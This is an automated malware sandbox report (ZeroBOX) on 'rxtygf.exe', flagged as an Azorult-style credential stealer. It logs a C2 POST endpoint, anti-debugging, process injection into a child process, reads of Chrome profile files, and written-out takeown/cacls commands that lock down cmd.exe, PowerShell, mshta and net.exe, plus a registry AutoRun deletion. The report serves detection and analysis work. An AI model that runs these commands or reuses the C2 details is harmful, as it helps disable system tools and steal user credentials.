Summary | ZeroBOX

rxtygf.exe

Tags: .NET framework (MSIL), Admin Tool (Sysinternals etc.), Malicious Library, HTTP, Escalate privileges, Internet API, Http API, AntiDebug, PE File, PE32, .NET EXE, AntiVM
Category FILE
Machine s1_win7_x6403_us
Started July 18, 2023, 7:16 a.m.
Completed July 18, 2023, 7:25 a.m.
Size 387.0KB
Type PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5 ad607f046a6f855f06d0e7b2cab189c1
SHA256 552719d9dda2789ec880ab52ba8c7e695b631d6fab6d56474b4b6a4f8fe4c21e
CRC32 79FF024D
ssdeep 6144:VZVgqnvYmMKNLgYApEBQh9jToGZaFROm7kv6KreTqH6F:VZ+qnwSg/ECh9jTH3iGreTjF
Yara
  • Win32_Trojan_PWS_Net_1_Zero - Win32 Trojan PWS .NET Azorult
  • Admin_Tool_IN_Zero - Admin Tool Sysinternals
  • Is_DotNET_EXE - (no description)
  • Malicious_Library_Zero - Malicious_Library
  • PE_Header_Zero - PE File Signature
  • IsPE32 - (no description)

IP Address Status Action
104.21.76.77 Active Moloch
164.124.101.2 Active Moloch
173.231.16.76 Active Moloch

Suricata Alerts

Flow | SID | Signature | Category
TCP 192.168.56.103:49509 -> 104.21.76.77:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined
TCP 192.168.56.103:49508 -> 173.231.16.76:80 | 2021997 | ET POLICY External IP Lookup api.ipify.org | Device Retrieving External IP Address Detected

Suricata TLS

Flow | Issuer | Subject | Fingerprint
TLSv1 192.168.56.103:49509 -> 104.21.76.77:443 | C=US, O=Google Trust Services LLC, CN=GTS CA 1P5 | CN=whyers.io | b5:70:31:dc:b0:cd:7d:e9:af:71:21:ec:4b:e6:97:ce:e4:da:a6:57

Time & API | Arguments | Status | Return | Repeated
GetComputerNameW | computer_name: TEST22-PC | 1 | 1 | 0 (18 identical calls)
GetComputerNameA | computer_name: TEST22-PC | 1 | 1 | 0 (2 identical calls)
Time & API | Arguments | Status | Return | Repeated
IsDebuggerPresent | (none) | - | 0 | 0 (2 identical calls)
Time & API | Arguments | Status | Return | Repeated
WriteConsoleW: 50 calls, each with console_handle: 0x00000007 and Status 1, Return 1, Repeated 0. The buffers, in call order, are the batch file being echoed by cmd.exe as it runs:
  C:\Users\test22\AppData\Local\Temp>
  reg
  delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor" /v "AutoRun" /f
  C:\Users\test22\AppData\Local\Temp>
  takeown
  /f C:\Windows\system32\cmd.exe /a
  C:\Users\test22\AppData\Local\Temp>
  echo
  y
  cacls
  C:\Windows\system32\cmd.exe /g Administrators:f
  C:\Users\test22\AppData\Local\Temp>
  echo
  y
  cacls
  C:\Windows\system32\cmd.exe /e /g Users:r
  C:\Users\test22\AppData\Local\Temp>
  echo
  y
  cacls
  C:\Windows\system32\cmd.exe /e /g Administrators:r
  C:\Users\test22\AppData\Local\Temp>
  echo
  y
  cacls
  C:\Windows\system32\cmd.exe /e /d SERVICE
  C:\Users\test22\AppData\Local\Temp>
  echo
  y
  cacls
  C:\Windows\system32\cmd.exe /e /d mssqlserver
  C:\Users\test22\AppData\Local\Temp>
  echo
  Y
  cacls
  C:\Windows\system32\cmd.exe /e /d "network service"
  C:\Users\test22\AppData\Local\Temp>
  echo
  y
  cacls
  C:\Windows\system32\cmd.exe /e /g system:r
  C:\Users\test22\AppData\Local\Temp>
  echo
  Y
  cacls
  C:\Windows\system32\cmd.exe /e /d mssql$sqlexpress
  C:\Users\test22\AppData\Local\Temp>
  takeown
  /f C:\Windows\SysWOW64\cmd.exe /a
  C:\Users\test22\AppData\Local\Temp>
Time & API | Arguments | Status | Return | Repeated
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x00531580, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 | 1 | 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x00531680, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 | 1 | 0
CryptExportKey | buffer: <INVALID POINTER>, crypto_handle: 0x00531680, flags: 0, crypto_export_handle: 0x00000000, blob_type: 6 | 1 | 1 | 0
Note: blob_type 6 is PUBLICKEYBLOB and a zero crypto_export_handle means the blob is not wrapped with an exchange key; a NULL output buffer with a successful return is the usual size-query call before the real export, so these three calls are consistent with the public half of an RSA key being read out, not with private key material being written anywhere.
Time & API | Arguments | Status | Return | Repeated
GlobalMemoryStatusEx | (none) | 1 | 1 | 0
suspicious_features GET method with no useragent header suspicious_request GET http://api.ipify.org/
suspicious_features POST method with no referer header, POST method with no useragent header suspicious_request POST https://whyers.io/QWEwqdsvsf/ap.php
request GET http://api.ipify.org/
request POST https://whyers.io/QWEwqdsvsf/ap.php
request POST https://whyers.io/QWEwqdsvsf/ap.php
Time & API | Arguments | Status | Return | Repeated
All 50 calls below come from process_identifier 1680 with process_handle 0xffffffff (the current process), stack_dep_bypass 0 and stack_pivoted 0, and request protection 64 (PAGE_EXECUTE_READWRITE). The size column is region_size for NtAllocateVirtualMemory and length for NtProtectVirtualMemory.

API | base_address | size | allocation_type | heap_dep_bypass | Status | Return | Repeated
NtAllocateVirtualMemory | 0x00710000 | 1835008 | 8192 (MEM_RESERVE) | 0 | 1 | 0 | 0
NtAllocateVirtualMemory | 0x00890000 | 4096 | 4096 (MEM_COMMIT) | 1 | 1 | 0 | 0
NtProtectVirtualMemory | 0x73f31000 | 4096 | - | 0 | 1 | 0 | 0
NtProtectVirtualMemory | 0x73f32000 | 4096 | - | 0 | 1 | 0 | 0
NtAllocateVirtualMemory | 0x00710000 | 589824 | 8192 (MEM_RESERVE) | 0 | 1 | 0 | 0
NtAllocateVirtualMemory | 0x00760000 | 4096 | 4096 (MEM_COMMIT) | 1 | 1 | 0 | 0
NtAllocateVirtualMemory | 0x00492000 | 4096 | 4096 (MEM_COMMIT) | 1 | 1 | 0 | 0
NtAllocateVirtualMemory | 0x00605000 | 4096 | 4096 (MEM_COMMIT) | 1 | 1 | 0 | 0
NtAllocateVirtualMemory | 0x0060b000 | 4096 | 4096 (MEM_COMMIT) | 1 | 1 | 0 | 0
NtAllocateVirtualMemory | 0x00607000 | 4096 | 4096 (MEM_COMMIT) | 1 | 1 | 0 | 0
NtAllocateVirtualMemory | 0x004ac000 | 4096 | 4096 (MEM_COMMIT) | 1 | 1 | 0 | 0
NtAllocateVirtualMemory | 0x00730000 | 4096 | 4096 (MEM_COMMIT) | 1 | 1 | 0 | 0
NtAllocateVirtualMemory | 0x0049a000 | 4096 | 4096 (MEM_COMMIT) | 1 | 1 | 0 | 0
NtAllocateVirtualMemory | 0x005fa000 | 4096 | 4096 (MEM_COMMIT) | 1 | 1 | 0 | 0
NtAllocateVirtualMemory | 0x005f7000 | 4096 | 4096 (MEM_COMMIT) | 1 | 1 | 0 | 0
NtAllocateVirtualMemory | 0x004aa000 | 4096 | 4096 (MEM_COMMIT) | 1 | 1 | 0 | 0
NtAllocateVirtualMemory | 0x00731000 | 12288 | 4096 (MEM_COMMIT) | 1 | 1 | 0 | 0
NtAllocateVirtualMemory | 0x005f6000 | 4096 | 4096 (MEM_COMMIT) | 1 | 1 | 0 | 0
NtAllocateVirtualMemory | 0x00734000 | 4096 | 4096 (MEM_COMMIT) | 1 | 1 | 0 | 0
NtAllocateVirtualMemory | 0x0049c000 | 4096 | 4096 (MEM_COMMIT) | 1 | 1 | 0 | 0
NtAllocateVirtualMemory | 0x00735000 | 4096 | 4096 (MEM_COMMIT) | 1 | 1 | 0 | 0
NtAllocateVirtualMemory | 0x00736000 | 4096 | 4096 (MEM_COMMIT) | 1 | 1 | 0 | 0
NtAllocateVirtualMemory | 0x00737000 | 12288 | 4096 (MEM_COMMIT) | 1 | 1 | 0 | 0
NtAllocateVirtualMemory | 0x0073a000 | 24576 | 4096 (MEM_COMMIT) | 1 | 1 | 0 | 0
NtAllocateVirtualMemory | 0x04b50000 | 4096 | 4096 (MEM_COMMIT) | 1 | 1 | 0 | 0
NtAllocateVirtualMemory | 0x04b51000 | 4096 | 4096 (MEM_COMMIT) | 1 | 1 | 0 | 0
NtAllocateVirtualMemory | 0x04b52000 | 4096 | 4096 (MEM_COMMIT) | 1 | 1 | 0 | 0
NtAllocateVirtualMemory | 0x04b53000 | 4096 | 4096 (MEM_COMMIT) | 1 | 1 | 0 | 0
NtAllocateVirtualMemory | 0x00891000 | 4096 | 4096 (MEM_COMMIT) | 1 | 1 | 0 | 0
NtAllocateVirtualMemory | 0x04b54000 | 4096 | 4096 (MEM_COMMIT) | 1 | 1 | 0 | 0
NtAllocateVirtualMemory | 0x04b55000 | 28672 | 4096 (MEM_COMMIT) | 1 | 1 | 0 | 0
NtAllocateVirtualMemory | 0x04b5c000 | 4096 | 4096 (MEM_COMMIT) | 1 | 1 | 0 | 0
NtAllocateVirtualMemory | 0x04b5d000 | 4096 | 4096 (MEM_COMMIT) | 1 | 1 | 0 | 0
NtAllocateVirtualMemory | 0x04b5e000 | 4096 | 4096 (MEM_COMMIT) | 1 | 1 | 0 | 0
NtAllocateVirtualMemory | 0x04b5f000 | 4096 | 4096 (MEM_COMMIT) | 1 | 1 | 0 | 0
NtAllocateVirtualMemory | 0x004ad000 | 4096 | 4096 (MEM_COMMIT) | 1 | 1 | 0 | 0
NtAllocateVirtualMemory | 0x051f0000 | 4096 | 4096 (MEM_COMMIT) | 1 | 1 | 0 | 0
NtAllocateVirtualMemory | 0x051f1000 | 8192 | 4096 (MEM_COMMIT) | 1 | 1 | 0 | 0
NtAllocateVirtualMemory | 0x051f3000 | 4096 | 4096 (MEM_COMMIT) | 1 | 1 | 0 | 0
NtAllocateVirtualMemory | 0x051f4000 | 4096 | 4096 (MEM_COMMIT) | 1 | 1 | 0 | 0
NtAllocateVirtualMemory | 0x051f5000 | 4096 | 4096 (MEM_COMMIT) | 1 | 1 | 0 | 0
NtAllocateVirtualMemory | 0x051f6000 | 4096 | 4096 (MEM_COMMIT) | 1 | 1 | 0 | 0
NtAllocateVirtualMemory | 0x051f7000 | 4096 | 4096 (MEM_COMMIT) | 1 | 1 | 0 | 0
NtAllocateVirtualMemory | 0x051f8000 | 16384 | 4096 (MEM_COMMIT) | 1 | 1 | 0 | 0
NtAllocateVirtualMemory | 0x051fc000 | 4096 | 4096 (MEM_COMMIT) | 1 | 1 | 0 | 0
NtAllocateVirtualMemory | 0x051fd000 | 4096 | 4096 (MEM_COMMIT) | 1 | 1 | 0 | 0
NtProtectVirtualMemory | 0x06770400 | 38400 | - | 0 | - | 3221225550 (0xC000004E, STATUS_SECTION_PROTECTION) | 0
NtAllocateVirtualMemory | 0x051fe000 | 4096 | 4096 (MEM_COMMIT) | 1 | 1 | 0 | 0
NtAllocateVirtualMemory | 0x051ff000 | 4096 | 4096 (MEM_COMMIT) | 1 | 1 | 0 | 0
NtAllocateVirtualMemory | 0x06830000 | 4096 | 4096 (MEM_COMMIT) | 1 | 1 | 0 | 0

Note: the only failed call is the NtProtectVirtualMemory on 0x06770400, where the requested RWX protection is incompatible with the mapping's initial protection; every committed page in the list is flagged heap_dep_bypass 1 because it is writable and executable at once, which is what this signature reports.
Time & API | Arguments | Status | Return | Repeated
GetDiskFreeSpaceExW | root_path: C:, total_number_of_bytes: 34252779520, total_number_of_free_bytes: 9933119488, free_bytes_available: 9933119488 | 1 | 1 | 0
GetDiskFreeSpaceExW | root_path: E:, total_number_of_bytes: 104853504, total_number_of_free_bytes: 75309056, free_bytes_available: 75309056 | 1 | 1 | 0
GetDiskFreeSpaceExW | root_path: C:\, total_number_of_bytes: 34252779520, total_number_of_free_bytes: 9933086720, free_bytes_available: 0 | 1 | 1 | 0
GetDiskFreeSpaceExW | root_path: D:\, total_number_of_bytes: 0, total_number_of_free_bytes: 0, free_bytes_available: 0 | - | 0 | 0
GetDiskFreeSpaceExW | root_path: E:\, total_number_of_bytes: 104853504, total_number_of_free_bytes: 75304960, free_bytes_available: 0 | 1 | 1 | 0
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\QuotaManager-journal
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm\LOCK
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\4cb013792b196a35_1
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\4cb013792b196a35_0
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Crashpad\metadata
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\LOG
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\b1152479bea6c46553d8c242ffa5edf2b0a050a7\290dcccb-9986-4f16-98a9-c54df8312e93
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm\000003.log
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\000003.log
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\CURRENT
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\databases
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\b1152479bea6c46553d8c242ffa5edf2b0a050a7\290dcccb-9986-4f16-98a9-c54df8312e93\index-dir
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\000003.log
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\LOG.old
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Origin Bound Certs
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\chrome_shutdown_ms.txt
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Thumbnails\000003.log
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\LOG.old
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_2
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Thumbnails\LOG.old
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\index
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Preferences
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Crashpad\reports\8dc74f67-39b6-4058-9ac1-6f782fcd0d62.dmp
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG.old
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOCK
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOCK
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\previews_opt_out.db
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Last Session
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Cache\index
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\b1152479bea6c46553d8c242ffa5edf2b0a050a7\index.txt
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Cache
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Data
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Favicons
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\LOG
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm\LOG
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\b1152479bea6c46553d8c242ffa5edf2b0a050a7\290dcccb-9986-4f16-98a9-c54df8312e93\52eca80efb7ea8c5_0
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\Default\TransportSecurity
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_1
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_0
file C:\Sandbox\test22\DefaultBox\user\current\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_3
domain api.ipify.org
file C:\Users\Public\Pictures\Kill-Delete.bat
file C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Narrator.lnk
file C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\computer.lnk
file C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Fax Recipient.lnk
file C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Windows Explorer.lnk
file C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Window Switcher.lnk
file C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Ease of Access.lnk
file C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Notepad.lnk
file C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Shows Desktop.lnk
file C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Command Prompt.lnk
file C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Private Character Editor.lnk
file C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\On-Screen Keyboard.lnk
file C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Magnify.lnk
file C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Control Panel.lnk
file C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Help.lnk
file C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Run.lnk
cmdline cacls C:\Windows\SysWOW64\mshta.exe /e /g Administrators:r
cmdline cacls C:\Windows\SysWOW64\cmd.exe /e /d "network service"
cmdline cacls C:\Windows\system32\cmd.exe /e /g Administrators:r
cmdline cacls C:\Windows\SysWOW64\cmd.exe /e /g Administrators:r
cmdline cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
cmdline takeown /f C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /a
cmdline takeown /f C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /a
cmdline cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d system
cmdline cacls C:\Windows\SysWOW64\cmd.exe /e /d mssqlserver
cmdline cacls C:\Windows\SysWOW64\mshta.exe /g Administrators:f
cmdline cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
cmdline cacls C:\Windows\system32\cmd.exe /g Administrators:f
cmdline takeown /f C:\Windows\system32\cmd.exe /a
cmdline C:\Windows\system32\cmd.exe /S /D /c" echo Y"
cmdline cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
cmdline cacls C:\Windows\SysWOW64\cmd.exe /e /g system:r
cmdline cacls C:\Windows\SysWOW64\mshta.exe /e /d mssqlserver
cmdline cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE
cmdline cacls C:\Windows\system32\cmd.exe /e /g system:r
cmdline takeown /f C:\Windows\SysWOW64\cmd.exe /a
cmdline cacls C:\Windows\SysWOW64\mshta.exe /e /d SERVICE
cmdline cacls C:\Windows\system32\cmd.exe /e /d SERVICE
cmdline cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f
cmdline cacls C:\Windows\SysWOW64\cmd.exe /e /g Users:r
cmdline takeown /f C:\Windows\SysWOW64\mshta.exe /a
cmdline cacls C:\Windows\system32\mshta.exe /g Administrators:f
cmdline cacls C:\Windows\system32\mshta.exe /e /d system
cmdline cacls C:\Windows\system32\cmd.exe /e /d mssqlserver
cmdline cacls C:\Windows\system32\cmd.exe /e /d "network service"
cmdline cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f
cmdline C:\Windows\system32\cmd.exe /S /D /c" echo y"
cmdline cacls C:\Windows\system32\cmd.exe /e /g Users:r
cmdline cacls C:\Windows\system32\mshta.exe /e /g Administrators:r
cmdline cacls C:\Windows\SysWOW64\cmd.exe /e /d SERVICE
cmdline cacls C:\Windows\SysWOW64\mshta.exe /e /d "network service"
cmdline cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress
cmdline cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r
cmdline cacls C:\Windows\system32\mshta.exe /e /d mssqlserver
cmdline cacls C:\Windows\system32\mshta.exe /e /d mssql$sqlexpress
cmdline cacls C:\Windows\SysWOW64\cmd.exe /e /d mssql$sqlexpress
cmdline cacls C:\Windows\system32\cmd.exe /e /d mssql$sqlexpress
cmdline cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d mssqlserver
cmdline cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE
cmdline cacls C:\Windows\SysWOW64\mshta.exe /e /d system
cmdline cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
cmdline cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d mssqlserver
cmdline cacls C:\Windows\SysWOW64\cmd.exe /g Administrators:f
cmdline cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress
cmdline cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d system
cmdline cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeTakeOwnershipPrivilege
1 1 0

(the SeTakeOwnershipPrivilege lookup above is recorded 8 more times with identical arguments and status: 9 LookupPrivilegeValueW calls for SeTakeOwnershipPrivilege in total, before the second SeDebugPrivilege lookup that follows)

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
url https://www.torproject.org/download/
description Match Windows Http API call rule Str_Win32_Http_API
description Escalate privileges rule Escalate_priviledges
description Communications over HTTP rule Network_HTTP
description Match Windows Inet API call rule Str_Win32_Internet_API
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
cmdline cacls C:\Windows\system32\net.exe /e /d system
cmdline cacls C:\Windows\system32\net.exe /e /d "network service"
cmdline cacls C:\Windows\system32\net.exe /e /g Users:r
cmdline cacls C:\Windows\system32\net.exe /g Administrators:f
cmdline cacls C:\Windows\system32\net.exe /e /d SERVICE
cmdline cacls C:\Windows\SysWOW64\net.exe /g Administrators:f
cmdline cacls C:\Windows\system32\net.exe /e /d mssql$sqlexpress
cmdline cacls C:\Windows\SysWOW64\net.exe /e /d system
cmdline cacls C:\Windows\system32\net.exe /e /d mssqlserver
cmdline cacls C:\Windows\SysWOW64\net.exe /e /d "network service"
cmdline reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor" /v "AutoRun" /f
cmdline cacls C:\Windows\SysWOW64\net.exe /e /g Administrators:r
cmdline cacls C:\Windows\SysWOW64\net.exe /e /d SERVICE
cmdline cacls C:\Windows\SysWOW64\net.exe /e /d mssql$sqlexpress
cmdline takeown /f C:\Windows\SysWOW64\net.exe /a
cmdline cacls C:\Windows\SysWOW64\net.exe /e /g Users:r
cmdline takeown /f C:\Windows\system32\net.exe /a
cmdline cacls C:\Windows\SysWOW64\net.exe /e /d mssqlserver
cmdline cacls C:\Windows\system32\net.exe /e /g Administrators:r
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 7492
region_size: 176128
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000004d8
1 0 0

NtProtectVirtualMemory

process_identifier: 7492
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 176128
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
process_handle: 0x000004d8
1 0 0
Time & API Arguments Status Return Repeated

NtQuerySystemInformation

information_class: 8 (SystemProcessorPerformanceInformation)
1 0 0
description rxtygf.exe tried to sleep 5456509 seconds, actually delayed analysis time by 5456509 seconds
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $ôG2°&va°&va°&vaëNu`º&vaëNs`(&vaLs`œ&vaLr`¡&vaLu`¤&vaëNq`±&vaëNr`£&vaëNw`£&va°&wa &vaÄM~`½&vaÄM‰a±&vaÄMt`±&vaRich°&vaPELYOdà |ü§“@°@ȀàÌ@8x@Ð.textôz| `.rdata\”–€@@.dataPK0@À.rsrcà€&@@.reloc̐(@B
base_address: 0x00400000
process_identifier: 7492
process_handle: 0x000004d8
1 1 0

WriteProcessMemory

buffer: €0€ H`€}<?xml version='1.0' encoding='UTF-8' standalone='yes'?> <assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'> <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> <security> <requestedPrivileges> <requestedExecutionLevel level='asInvoker' uiAccess='false' /> </requestedPrivileges> </security> </trustInfo> </assembly>
base_address: 0x00428000
process_identifier: 7492
process_handle: 0x000004d8
1 1 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 7492
process_handle: 0x000004d8
1 1 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $ôG2°&va°&va°&vaëNu`º&vaëNs`(&vaLs`œ&vaLr`¡&vaLu`¤&vaëNq`±&vaëNr`£&vaëNw`£&va°&wa &vaÄM~`½&vaÄM‰a±&vaÄMt`±&vaRich°&vaPELYOdà |ü§“@°@ȀàÌ@8x@Ð.textôz| `.rdata\”–€@@.dataPK0@À.rsrcà€&@@.reloc̐(@B
base_address: 0x00400000
process_identifier: 7492
process_handle: 0x000004d8
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob
Process injection Process 1680 called NtSetContextThread to modify thread in remote process 7492
Time & API Arguments Status Return Repeated

NtSetContextThread

registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4232103
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000004d4
process_identifier: 7492
1 0 0
